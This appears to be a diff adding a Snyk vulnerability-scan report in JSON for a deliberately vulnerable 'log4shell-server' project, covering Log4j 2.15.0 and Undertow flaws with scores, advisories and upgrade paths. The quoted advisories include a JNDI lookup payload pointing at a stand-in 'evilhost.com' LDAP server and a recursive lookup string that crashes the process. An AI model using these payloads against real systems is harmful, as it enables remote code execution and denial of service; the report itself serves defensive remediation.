+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9,
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 8.1,
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:32.295395Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 8.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99901",
+ "probability": "0.97307",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45046"
+ ],
+ "CWE": [
+ "CWE-94"
+ ],
+ "GHSA": [
+ "GHSA-7rjr-3q55-vv33"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-14T18:28:31.339218Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-14T18:01:28Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "Nuclei Templates",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-14T18:44:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:25.837600Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.16.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "title": "Denial of Service (DoS)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "credit": [
+ "Hideki Okamoto of Akamai Technologies"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.3)",
+ "[2.13.0,2.17.0)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.3",
+ "2.17.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "high",
+ "cvssScore": 7.5,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3230",
+ "title": "JIRA Issue"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:38.288854Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
+ "epssDetails": {
+ "percentile": "0.99523",
+ "probability": "0.95998",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45105"
+ ],
+ "CWE": [
+ "CWE-400"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-17T18:23:58.542986Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-17T18:20:21Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-18T07:05:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.516498Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "high",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "title": "Arbitrary Code Execution",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta7,2.3.2)",
+ "[2.4,2.12.4)",
+ "[2.13.0,2.17.1)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.2",
+ "2.12.4",
+ "2.17.1"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.6,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3293",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1",
+ "title": "Openwall Mail"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:04:47.220633Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
+ "epssDetails": {
+ "percentile": "0.89722",
+ "probability": "0.02239",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-44832"
+ ],
+ "CWE": [
+ "CWE-94"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-28T19:42:55.818691Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-28T19:42:53Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-28T20:17:52Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.472982Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.1"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
